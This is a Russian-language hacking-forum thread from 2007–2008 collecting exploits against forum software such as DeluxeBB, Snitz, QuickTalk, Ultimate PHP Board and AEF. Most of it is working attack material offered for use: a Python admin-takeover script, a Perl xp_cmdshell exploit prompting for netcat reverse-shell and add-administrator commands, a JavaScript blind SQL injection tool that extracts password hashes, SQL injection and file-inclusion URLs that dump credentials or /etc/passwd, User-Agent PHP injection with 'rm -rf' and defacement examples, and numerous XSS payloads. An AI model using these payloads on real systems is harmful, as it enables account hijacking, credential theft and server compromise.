ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
DeluxeBB <= 1.09 Remote Admin Email Change Exploit |
26.11.2007, 16:58
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
DeluxeBB <= 1.09 Remote Admin Email Change Exploit
Движок: DeluxeBB
Версия: <= 1.9
Код:
#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
_ __ _____ _____ _ __
| '_ \ / _ \ \/ / _ \ '_ \
| | | | __/> < __/ | | |
|_| |_|\___/_/\_\___|_| |_|
------------------------------------------------------------------------------------------------
§ DeluxeBB 0day Remote Change Admin's credentials §
------------------------------------------------------------------------------------------------
nexen
------------------------------------------------------------------------------------------------
PoC / Bug Explanation:
When you update your profile,
DeluxeBB execute a vulnerable query:
$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");
So, editing cookie "membercookie" you can change remote user's email.
Enjoy ;)
------------------------------------------------------------------------------------------------
'''
import httplib, urllib, sys, md5
from random import randint
print "\n########################################################################################"
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "
print " "
print " Vulnerability Discovered By Nexen "
print " Greetz to The:Paradox that Coded the Exploit. "
print " "
print " Usage: "
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])
print " "
print " Additional Flags: "
print " -id34 -passMypassword -port80 "
print " "
print " Example: "
print " python %s 127.0.0.1 admin /DeluxeBB/ me@it.com -port81 " % (sys.argv[0])
print " "
print "########################################################################################\n"
if len(sys.argv)<=4: sys.exit()
else: print "[.]Exploit Starting."
target = sys.argv[1]
admin_nick = sys.argv[2]
path = sys.argv[3]
real_email = sys.argv[4]
botpass = "the-new-administrator"
rand = randint(1, 99999)
dn1 = 0
dn2 = 0
dn3 = 0
try:
for line in sys.argv[:]:
if line.find('-pass') != -1 and dn1 == 0:
upass = line.split('-pass')[1]
dn1 = 1
elif line.find('-pass') == -1 and dn1 == 0:
upass = ""
if line.find('-id') != -1 and dn2 == 0:
userid = line.split('-id')[1]
dn2 = 1
elif line.find('-id') == -1 and dn2 == 0:
userid = ""
if line.find('-port') != -1 and dn3 == 0:
port = line.split('-port')[1]
dn3 = 1
elif line.find('-port') == -1 and dn3 == 0:
port = "80"
except:
sys.exit("[-]Some error in Additional Flag.")
if upass=="" and userid != "" or userid == "" and upass != "":
print "[-]Bad Additional flags -id -pass given, ignoring them."
upass=""
userid=""
############################################################################################Trying to connect.
try:
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "")
except: sys.exit("[-]Cannot connect. Check Target.")
############################################################################################Registering a new user if id or upass not defined
try:
conn = httplib.HTTPConnection(target,port)
if upass == "" or userid == "":
conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d@yoursystemgotpowned.it' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
cookies = response.getheader('set-cookie').split(";")
#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)
print "[.]Registering a new user. -->",response.status, response.reason
conn.close()
############################################################################################Getting memberid in Cookies
for line in cookies[:]:
if line.find('memberid') != -1:
mid = line.split('memberid=')[1]
############################################################################################Isset like starts
try: mid
except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")
except AttributeError:
sys.exit("[-]AttributeError Check your Target/path.")
############################################################################################Doing some Md5
if upass=="" or userid=="":
hash = md5.new()
hash.update(botpass)
passmd5 = hash.hexdigest()
else:
hash = md5.new()
hash.update(upass)
passmd5 = hash.hexdigest()
mid = userid
############################################################################################Updating "victim" email in Profile
conn = httplib.HTTPConnection(target,port)
conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason
conn.close()
print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"
# milw0rm.com [2007-11-26]
|
|
|
05.01.2008, 02:21
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
SNITZ FORUMS 2000
Сайт: http://forum.snitz.com/
Описание: Форум малораспространенный, но все же иногда приходится с ним сталкиваться.
Даты выхода версий: http://sourceforge.net/project/showfiles.php?group_id=8812&package_id=8895
P.S. google.ru: Результаты 1 - 10 из примерно 2 270 000 для "Powered by Snitz"
Snitz2000 3.1 SR4
16 февраля 2007
SQL инъекция в файле pop_profile.asp
ссылка: http://www.milw0rm.com/exploits/3321
Snitz2000 (3.3 - 3.3.03)
20 апреля 2002
SQL инъекция в members.asp
Код:
/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=
Snitz2000 3.3.03
13 мая 2003
SQL инъекция в register.asp
Не фильтруется поле email. Возможен запуск xp_cmdshell (пользователь "sa")
Сплоит:
Код:
#!/usr/bin/perl
use Socket;
print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}
print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}
print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}
print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );
print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
close( FILEHANDLE );
}
sub open_TCP
{
my( $FS, $dest, $port ) = @_;
my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;
my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}
Snitz2000 3.4 (?)
18 апреля 2003
XSS. Обходятся существующие фильтры символом табуляции (0x09)
Например:
Код:
[img]jav asc ript:alert%28document.cookie%29[/img]
Snitz2000 3.4.03
1). Сброс пароля у любого пользователя
21 июня 2003
Запрашиваем "забытый пароль". Сохраняем страницу на HDD. Меняем ID пользователя в блокноте (например) на любой существующий. Жмем кнопку. Все
2). XSS
21 июня 2003
Код:
http://path/search.asp?Search="><script>alert()</script>
Snitz2000 3.4.04
1). XSS в файле register.asp
16 июня 2004
При регистрации нового пользователя/ редактировании аккаунта можно ввести в поле E-mail address
Код:
p@p" onMouseOver="alert(document.cookie);
2). Http response splitting
16 сентября 2004
Сплоит:
Код:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Preved</html>
Snitz2000 3.4.05
1). SQL инъекция в файле inc_header.asp
11 июня 2006
бажный кусок кода:
Код:
if strGroupCategories = "1" then
if Request.QueryString("Group") = "" then
if Request.Cookies(strCookieURL & "GROUP") = "" Then
Group = 2
else
Group = Request.Cookies(strCookieURL & "GROUP")
end if
else
Group = cLng(Request.QueryString("Group"))
end if
'set default
Session(strCookieURL & "GROUP_ICON") = "icon_group_categories.gif"
Session(strCookieURL & "GROUP_IMAGE") = strTitleImage
'Forum_SQL - Group exists ?
strSql = "SELECT GROUP_ID, GROUP_NAME, GROUP_ICON, GROUP_IMAGE "
strSql = strSql & " FROM " & strTablePrefix & "GROUP_NAMES "
strSql = strSql & " WHERE GROUP_ID = " & Group
set rs2 = my_Conn.Execute (strSql)
Сплоита нет
2). XSS в файле post.asp
2 ноября 2005
пример:
[CODE]http://[host]/snitz/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&type= Snitz2000 3.4.06
1). SQL инъекция в active.asp.
5 декабря 2007
Пользователь может получить привилегии администратора.
HTML-сплоит для поднятия прав (необходимо зарегистрироваться на форуме, зайти на него, исправить [VICTIM URL] на работающий адрес, ну и запустить его):
Код:
<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
2). XSS
14 сентября 2006
Код:
http://target.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()">
3). возможная XSS в файле pop_profile.asp.
7 марта 2007
Доказательств нет
ссылка: http://securityvulns.ru/CVE-2007-1374.html
Snitz2000 3.4 Avatar MOD 1.3
18 мая 2006
Загрузка произвольных файлов (шеллов и тд) в обход ограничений, указанных в моде (jpg, jpeg, gif, png), используюя POISON NULL BYTE (то есть %00)
________________________________________________
3.4.06 - последняя версия
При обнаружении ошибок и неточностей, а также если есть, чем дополнить, - прошу в ПМ (флудить тут не надо) пост восстановлен |
|
|
|
DeluxeBB 1.1 XSS Vulnerability |
23.01.2008, 02:01
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
DeluxeBB 1.1 XSS Vulnerability
DeluxeBB 1.1 XSS Vulnerability
PoC:
Код:
http://www.site.com/path/templates/default/admincp/attachments_header.php?lang_li
stofmatches=<script>alert("iddqd")</script>
|
|
|
|
MyPHP Forum Vulnerability |
05.01.2008, 15:53
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
MyPHP Forum Vulnerability
MyPHP Forum Vulnerability
Exploits/Shellcode
MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities
MyPHP Forum <= 3.0 (Final) Remote SQL Injection Vulnerability
SQL-инъекция во многих сценариях в MyPHP 1.0 форуме
Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды на системе.
Exploit:
Код:
/member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password,
status, email, website, aim, msn, location, sig, regdate, posts,
password as yahoo FROM nb_member WHERE uid='1
|
|
|
|
tinyBB v0.2 Message Board Remote File Include |
01.02.2008, 15:14
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
tinyBB v0.2 Message Board Remote File Include
Vendor: http://php.arsivimiz.com/indir.php?id=335
Remote File Include
Vulnerable: tinyBB v0.2
PoC:
Код:
http://victim.Com/ScriptPath/footers.php?tinybb_footers=[shell]
Последний раз редактировалось iddqd; 03.02.2008 в 13:52..
|
|
|
|
Уязвимости QuickTalk Forum |
13.03.2008, 12:09
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Уязвимости QuickTalk Forum
Уязвимости QuickTalk Forum
URL производителя: http://www.qt-cute.org/
QuickTalk Forum <= 1.6 Blind SQL Injection Exploit
Код:
<html>
<head>
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
-----------------------------------------------------------------------------------------------
- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -
- Info ---------------------------------------------------------------------------------------
- Author: t0pP8uZz & xprog -----------------------------------------------------------
- Exploit Coded By t0pP8uZz ---------------------------------------------------------
- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------
----------------------------------------------------------------------------------------------
- Passwords ARE IN MD5 ----------------------------------------------------
- Peace -----------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
*/
var site, uid, res = "";
function Start() {
site = document.getElementById("site").value;
uid = document.getElementById("pid").value;
document.getElementById("output").value = "Exploiting, Please Wait..";
Main(1, 48);
}
function Main(substr, num) {
var xmlhttp = false;
var url = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";
try {
xmlhttp = new XMLHttpRequest();
} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }
if(xmlhttp) {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4) {
var content = xmlhttp.responseText;
var ele = document.getElementById("output");
if(!content.match(/0 Found/i)) {
res += String.fromCharCode(num);
ele.value = res;
num = 48;
substr++;
}
else {
if(num == 59) { num = 96; }
else { num++; }
}
if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }
Main(substr, num)
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send(null);
}
}
</script>
<style type="text/css">
<!--
.style1{color: #CC0000}
.style2 { color: #000000; font-size: 12px;}
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }
.style4 {color: #FF0000; font-size: 10px;}
-->
</style>
</head>
<body>
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>
</body>
</html>
Инклюдинг локальных файлов в QuickTalk forum
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.
Код:
http://[host]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
http://[host]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
http://[host]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00
|
|
|
|
16.06.2008, 11:41
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Forum Pay Per Post Exchange <= 2.0 SQL Injection Vulnerabilitys
Код HTML:
-[*]+================================================================================+[*]-
-[*]+ Forum Pay Per Post Exchange <= 2.0 SQL Injection Vulnerabilitys +[*]-
-[*]+================================================================================+[*]-
By : Stack
http://alstrasoft.com/forum-pay-per-post-exchange.htm
Cost (single license): $175 (with 1 year updates)
Language: PHP
Platform: Unix, Win NT
Release: Dec 23, 2007
Current Version: 2.0
Last Update: Mar 10, 2008
exploit :
http://site.co.il/index.php?menu=forum_catview&catid=-1/**/UNION/**/SELECT/**/1,2,3,database(),5,version(),7/*
# milw0rm.com [2008-06-15]
milw0rm.com [2008-06-15]
|
|
|
|
[Обзор уязвимостей Ultimate PHP Board] |
11.07.2008, 14:29
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
[Обзор уязвимостей Ultimate PHP Board]
www.myupb.com
UBP Version <=1.9.6
Заводим себе админа
При установке форума заводится акаунт admin с уровнем доступа admin, но при повторной регистрации акаунта admin (но уже через register.php) скрипт не ругается и регистрирует его, но с правами member. В больших форумах (с большим числом пользователей) вероятна атака спуфинга (запрос паролей и другой информации от пользователей под видом администратора).
Bесь список юзеров, пароли ( к сожалению зашифрованные) почту юзера, дату реги, итп.
Код:
http://site.com/path_to_forum/db/users.dat
Отправка письма: от user к user2
Код:
http://site.com/path_to_file/send.
php?power_env=lwbteam&user_env=[user]&pass_env=lwbteam&id_env=[user2]&id=[user2]&message=LwBSecurityTeam
Возможность Залогинится под Админом или любым другим юзером
Код:
http://site.com/forum/admin_members.php?power_env=123&user_env=Admin&pass_env=123&id_env=Admin&lastvisit=0
Выполнение Кода
UPB протоколирует некоторую информацию о посетителях [такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории db, который называется iplog. Затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает iplog. Например:
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
когда администратор вызовет admin_iplog.php, ваш код php будет выполнен.
Пример:
1. <? system( "echo \'hacked\' > ../index.html" ); ?>
дефейсит главную страницу форума.
2. создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf *
после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php.
XSS
Код:
http://[target]/upb/login.php?ref=%27%3E%3Cscrip t%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/viewtopic.php?id=1&t_id=1&page= %27%3E%3Cscript%3Ealert( document.cookie)%3C/script%3E
http://[target]/upb/profile.php?action=get&id=%27 %3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
http://[target]/upb/newpost.php?id= 1&t=1&t_id= %27%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
http://[target]/upb/newpost.php?id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E
http://[ta rget]/upb/email.php?id=%27%3E%3C script%3Ealert(document.cookies)%3C/script%3E
http://[target]/upb/icq.php?action=get&id=%27%3E%3C script%3Ealert(document.cookie)%3C/scr ipt%3E
http://[target]/upb/aol.php?action=get&id=%27%3E%3C script%3Ealert(document.cookie)%3C/script%3E
http://[target]/upb/getpass.php?ref=%27%3E%3Cscript %3Ealert(d ocument.cookie)%3C/script%3E
http://[target]/upb/search.php?step=3&sText= %27%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
Раскрытые пути
Код:
http://site.com/web/forum/viewforum.php?'id'=4
http://site.com/web/forum/viewtopic.php?id=3'
UBP Version 2.0
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе, уязвимость существует из-за ошибки в обработке входных данных в параметре «_CONFIG[skin_dir]» сценарием header_simple.php. Атакующий может выполнить произвольный сценарий с привилегиями запущенного Web сервера.
Пример:
Код:
http://vul_site/path/includes/header_simple.php?_CONFIG[skin_dir]=shell
UBP 2.0b1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "option" сценарием chat/login.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
Код:
http://[target]/[path]/chat/login.php?option=chat&username=(code)
Последний раз редактировалось Sharingan; 11.07.2008 в 14:41..
|
|
|
|
09.09.2008, 15:54
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Форум: Advanced Electron Forum(AEF)
Версия: 1.0.6
Активные XSS
1 активная
Заходим в профиль уявимое поле WWW: вводим
Код:
"><script>alert('xss')</script>
2 активная
Создаём тему в названии темы вводим
Код:
"><script>alert('xss')</script>
3 активная
В подписи вводим:
Код:
[UR*L]http://" onmouseover="alert('xss');"[/URL]
[IM*G]http://" onmouseover="alert('xss');"[/IMG]
Поиск: Powered By AEF 1.0.6 © 2008 Electron Inc.
Скачать форум: http://www.anelectron.com/download.php
(c) ~!Dok_tOR!~
UPDATE
Advanced Electron Forum <= 1.0.6 Remote Code Execution
Сценарий /main/functions/bbc_functions.php
Уязвимый код:
PHP код:
//Email Links
if($globals['bbc_email']){
$text = preg_replace(
array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
"/\[email\](.*?)\[\/email\]/ies"),
array('check_email("$1", "$2")',
'check_email("$1", "$1")'), $text);
}
[/email]
Уязвимость существует из-за небезопасного вызова функции "preg_replace()" с параметром "e". Удаленный пользователь может с помощью специально сформированного тега выполнить произвольный PHP код на целевой системе с привилегиям Web сервера.
Пример:
Код:
[*email]{${phpinfo()}}
* - убрать конечно.
Решение: Установите последнюю версию 1.0.7 с сайта производителя.
Original link
Последний раз редактировалось ~!DoK_tOR!~; 04.10.2008 в 22:46..
|
|
|
|
01.10.2008, 17:00
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Форум: Discussion Forums 2k
Версия: 3.3.T
Офф.сайт: http://developer.berlios.de/projects/df2k/
SQL Injection
Код:
http://localhost/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*
Код:
http://localhost/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*
Код:
http://localhost/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*
XSS Passive
http://localhost/ [installdir]/Category.php?id="><script>alert('xss')</script>&SubID=0
http://localhost/ [installdir]/Messenger.php?act=Create&Sendto="><script>alert('x ss')</script>
(c) ~!Dok_tOR!~
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид